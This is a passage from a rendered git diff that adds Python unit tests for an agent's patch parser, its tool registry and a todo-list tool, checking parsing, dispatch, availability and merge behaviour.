x
|
||||
-y
|
||||
+z
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
assert len(ops) == 1
|
||||
assert len(ops[0].hunks) == 2
|
||||
assert ops[0].hunks[0].context_hint == "first"
|
||||
assert ops[0].hunks[1].context_hint == "second"
|
||||
|
||||
|
||||
class TestParseAddFile:
|
||||
def test_add_file(self):
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Add File: new/module.py
|
||||
+import os
|
||||
+
|
||||
+print("hello")
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
assert len(ops) == 1
|
||||
|
||||
op = ops[0]
|
||||
assert op.operation == OperationType.ADD
|
||||
assert op.file_path == "new/module.py"
|
||||
assert len(op.hunks) == 1
|
||||
|
||||
contents = [l.content for l in op.hunks[0].lines if l.prefix == "+"]
|
||||
assert contents[0] == "import os"
|
||||
assert contents[2] == 'print("hello")'
|
||||
|
||||
|
||||
class TestParseDeleteFile:
|
||||
def test_delete_file(self):
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Delete File: old/stuff.py
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
assert len(ops) == 1
|
||||
assert ops[0].operation == OperationType.DELETE
|
||||
assert ops[0].file_path == "old/stuff.py"
|
||||
|
||||
|
||||
class TestParseMoveFile:
|
||||
def test_move_file(self):
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Move File: old/path.py -> new/path.py
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
assert len(ops) == 1
|
||||
assert ops[0].operation == OperationType.MOVE
|
||||
assert ops[0].file_path == "old/path.py"
|
||||
assert ops[0].new_path == "new/path.py"
|
||||
|
||||
|
||||
class TestParseInvalidPatch:
|
||||
def test_empty_patch_returns_empty_ops(self):
|
||||
ops, err = parse_v4a_patch("")
|
||||
assert err is None
|
||||
assert ops == []
|
||||
|
||||
def test_no_begin_marker_still_parses(self):
|
||||
patch = """\
|
||||
*** Update File: f.py
|
||||
line1
|
||||
-old
|
||||
+new
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
assert len(ops) == 1
|
||||
|
||||
def test_multiple_operations(self):
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Add File: a.py
|
||||
+content_a
|
||||
*** Delete File: b.py
|
||||
*** Update File: c.py
|
||||
keep
|
||||
-remove
|
||||
+add
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
assert len(ops) == 3
|
||||
assert ops[0].operation == OperationType.ADD
|
||||
assert ops[1].operation == OperationType.DELETE
|
||||
assert ops[2].operation == OperationType.UPDATE
|
||||
121
tests/tools/test_registry.py
Normal file
121
tests/tools/test_registry.py
Normal file
@@ -0,0 +1,121 @@
|
||||
"""Tests for the central tool registry."""
|
||||
|
||||
import json
|
||||
|
||||
from tools.registry import ToolRegistry
|
||||
|
||||
|
||||
def _dummy_handler(args, **kwargs):
|
||||
return json.dumps({"ok": True})
|
||||
|
||||
|
||||
def _make_schema(name="test_tool"):
|
||||
return {"name": name, "description": f"A {name}", "parameters": {"type": "object", "properties": {}}}
|
||||
|
||||
|
||||
class TestRegisterAndDispatch:
|
||||
def test_register_and_dispatch(self):
|
||||
reg = ToolRegistry()
|
||||
reg.register(
|
||||
name="alpha",
|
||||
toolset="core",
|
||||
schema=_make_schema("alpha"),
|
||||
handler=_dummy_handler,
|
||||
)
|
||||
result = json.loads(reg.dispatch("alpha", {}))
|
||||
assert result == {"ok": True}
|
||||
|
||||
def test_dispatch_passes_args(self):
|
||||
reg = ToolRegistry()
|
||||
|
||||
def echo_handler(args, **kw):
|
||||
return json.dumps(args)
|
||||
|
||||
reg.register(name="echo", toolset="core", schema=_make_schema("echo"), handler=echo_handler)
|
||||
result = json.loads(reg.dispatch("echo", {"msg": "hi"}))
|
||||
assert result == {"msg": "hi"}
|
||||
|
||||
|
||||
class TestGetDefinitions:
|
||||
def test_returns_openai_format(self):
|
||||
reg = ToolRegistry()
|
||||
reg.register(name="t1", toolset="s1", schema=_make_schema("t1"), handler=_dummy_handler)
|
||||
reg.register(name="t2", toolset="s1", schema=_make_schema("t2"), handler=_dummy_handler)
|
||||
|
||||
defs = reg.get_definitions({"t1", "t2"})
|
||||
assert len(defs) == 2
|
||||
assert all(d["type"] == "function" for d in defs)
|
||||
names = {d["function"]["name"] for d in defs}
|
||||
assert names == {"t1", "t2"}
|
||||
|
||||
def test_skips_unavailable_tools(self):
|
||||
reg = ToolRegistry()
|
||||
reg.register(
|
||||
name="available",
|
||||
toolset="s",
|
||||
schema=_make_schema("available"),
|
||||
handler=_dummy_handler,
|
||||
check_fn=lambda: True,
|
||||
)
|
||||
reg.register(
|
||||
name="unavailable",
|
||||
toolset="s",
|
||||
schema=_make_schema("unavailable"),
|
||||
handler=_dummy_handler,
|
||||
check_fn=lambda: False,
|
||||
)
|
||||
defs = reg.get_definitions({"available", "unavailable"})
|
||||
assert len(defs) == 1
|
||||
assert defs[0]["function"]["name"] == "available"
|
||||
|
||||
|
||||
class TestUnknownToolDispatch:
|
||||
def test_returns_error_json(self):
|
||||
reg = ToolRegistry()
|
||||
result = json.loads(reg.dispatch("nonexistent", {}))
|
||||
assert "error" in result
|
||||
assert "Unknown tool" in result["error"]
|
||||
|
||||
|
||||
class TestToolsetAvailability:
|
||||
def test_no_check_fn_is_available(self):
|
||||
reg = ToolRegistry()
|
||||
reg.register(name="t", toolset="free", schema=_make_schema(), handler=_dummy_handler)
|
||||
assert reg.is_toolset_available("free") is True
|
||||
|
||||
def test_check_fn_controls_availability(self):
|
||||
reg = ToolRegistry()
|
||||
reg.register(
|
||||
name="t",
|
||||
toolset="locked",
|
||||
schema=_make_schema(),
|
||||
handler=_dummy_handler,
|
||||
check_fn=lambda: False,
|
||||
)
|
||||
assert reg.is_toolset_available("locked") is False
|
||||
|
||||
def test_check_toolset_requirements(self):
|
||||
reg = ToolRegistry()
|
||||
reg.register(name="a", toolset="ok", schema=_make_schema(), handler=_dummy_handler, check_fn=lambda: True)
|
||||
reg.register(name="b", toolset="nope", schema=_make_schema(), handler=_dummy_handler, check_fn=lambda: False)
|
||||
|
||||
reqs = reg.check_toolset_requirements()
|
||||
assert reqs["ok"] is True
|
||||
assert reqs["nope"] is False
|
||||
|
||||
def test_get_all_tool_names(self):
|
||||
reg = ToolRegistry()
|
||||
reg.register(name="z_tool", toolset="s", schema=_make_schema(), handler=_dummy_handler)
|
||||
reg.register(name="a_tool", toolset="s", schema=_make_schema(), handler=_dummy_handler)
|
||||
assert reg.get_all_tool_names() == ["a_tool", "z_tool"]
|
||||
|
||||
def test_handler_exception_returns_error(self):
|
||||
reg = ToolRegistry()
|
||||
|
||||
def bad_handler(args, **kw):
|
||||
raise RuntimeError("boom")
|
||||
|
||||
reg.register(name="bad", toolset="s", schema=_make_schema(), handler=bad_handler)
|
||||
result = json.loads(reg.dispatch("bad", {}))
|
||||
assert "error" in result
|
||||
assert "RuntimeError" in result["error"]
|
||||
101
tests/tools/test_todo_tool.py
Normal file
101
tests/tools/test_todo_tool.py
Normal file
@@ -0,0 +1,101 @@
|
||||
"""Tests for the todo tool module."""
|
||||
|
||||
import json
|
||||
|
||||
from tools.todo_tool import TodoStore, todo_tool
|
||||
|
||||
|
||||
class TestWriteAndRead:
|
||||
def test_write_replaces_list(self):
|
||||
store = TodoStore()
|
||||
items = [
|
||||
{"id": "1", "content": "First task", "status": "pending"},
|
||||
{"id": "2", "content": "Second task", "status": "in_progress"},
|
||||
]
|
||||
result = store.write(items)
|
||||
assert len(result) == 2
|
||||
assert result[0]["id"] == "1"
|
||||
assert result[1]["status"] == "in_progress"
|
||||
|
||||
def test_read_returns_copy(self):
|
||||
store = TodoStore()
|
||||
store.write([{"id": "1", "content": "Task", "status": "pending"}])
|
||||
items = store.read()
|
||||
items[0]["content"] = "MUTATED"
|
||||
assert store.read()[0]["content"] == "Task"
|
||||
|
||||
|
||||
class TestHasItems:
|
||||
def test_empty_store(self):
|
||||
store = TodoStore()
|
||||
assert store.has_items() is False
|
||||
|
||||
def test_non_empty_store(self):
|
||||
store = TodoStore()
|
||||
store.write([{"id": "1", "content": "x", "status": "pending"}])
|
||||
assert store.has_items() is True
|
||||
|
||||
|
||||
class TestFormatForInjection:
|
||||
def test_empty_returns_none(self):
|
||||
store = TodoStore()
|
||||
assert store.format_for_injection() is None
|
||||
|
||||
def test_non_empty_has_markers(self):
|
||||
store = TodoStore()
|
||||
store.write([
|
||||
{"id": "1", "content": "Do thing", "status": "completed"},
|
||||
{"id": "2", "content": "Next", "status": "pending"},
|
||||
])
|
||||
text = store.format_for_injection()
|
||||
assert "[x]" in text
|
||||
assert "[ ]" in text
|
||||
assert "Do thing" in text
|
||||
assert "context compression" in text.lower()
|
||||
|
||||
|
||||
class TestMergeMode:
|
||||
def test_update_existing_by_id(self):
|
||||
store = TodoStore()
|
||||
store.write([
|
||||
{"id": "1", "content": "Original", "status": "pending"},
|
||||
])
|
||||
store.write(
|
||||
[{"id": "1", "status": "completed"}],
|
||||
merge=True,
|
||||
)
|
||||
items = store.read()
|
||||
assert len(items) == 1
|
||||
assert items[0]["status"] == "completed"
|
||||
assert items[0]["content"] == "Original"
|
||||
|
||||
def test_merge_appends_new(self):
|
||||
store = TodoStore()
|
||||
store.write([{"id": "1", "content": "First", "status": "pending"}])
|
||||
store.write(
|
||||
[{"id": "2", "content": "Second", "status": "pending"}],
|
||||
merge=True,
|
||||
)
|
||||
items = store.read()
|
||||
assert len(items) == 2
|
||||
|
||||
|
||||
class TestTodoToolFunction:
|
||||
def test_read_mode(self):
|
||||
store = TodoStore()
|
||||
store.write([{"id": "1", "content": "Task", "status": "pending"}])
|
||||
result = json.loads(todo_tool(store=store))
|
||||
assert result["summary"]["total"] == 1
|
||||
assert result["summary"]["pending"] == 1
|
||||
|
||||
def test_write_mode(self):
|
||||
store = TodoStore()
|
||||
result = json.loads(todo_tool(
|
||||
todos=[{"id": "1", "content": "New", "status": "in_progress"}],
|
||||
store=store,
|
||||
))
|
||||
assert result["summary"]["in_progress"] == 1
|
||||
|
||||
def test_no_store_returns_error(self):
|
||||
result = json.loads(todo_tool())
|
||||
assert "error" in result
|
||||
Reference in New Issue
Block a user